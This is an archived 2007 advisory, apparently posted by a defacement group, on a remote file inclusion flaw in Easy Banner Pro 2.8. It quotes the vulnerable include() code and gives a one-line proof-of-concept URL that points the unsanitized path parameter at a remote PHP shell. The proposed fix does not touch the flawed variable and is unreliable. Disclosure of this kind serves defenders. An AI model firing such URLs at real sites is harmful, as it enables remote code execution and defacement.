Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15663
HistoryJan 10, 2007 - 12:00 a.m.

Easy Banner Pro Version 2.8 <= Remote File Inclusion

2007-01-1000:00:00
vulners.com
15

±-------------------------------------------------------------------

  • Easy Banner Pro Version 2.* <= Remote File Inclusion

±-------------------------------------------------------------------

±-------------------------------------------------------------------

  • Code info.php:

  • include('./functions.php');

  • include_once("$s[phppath]/data/messages.php");

  • if (!$s[nocron]) include_once("$s[phppath]/rebuild_f.php");

  • include('./data/time.php');

±-------------------------------------------------------------------

  • $s[phppath] is not properly sanitized before being used.

  • The bug is in the "PDD" Package for PHPSelect Web Development Division.

±-------------------------------------------------------------------

  • Solution:

  • Add this line to your php-file:

  • $Application_Root ="user/dir" //Your root path

±-------------------------------------------------------------------

  • PoC:

http://[target]/info.php?s[phppath]=http://phpshell

±-------------------------------------------------------------------

  • [W]orld [D]efacers [T]eam

  • Greets:

  • || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||

  • || Pro Hacker ||

±------------------------[ W D T ]----------------------------------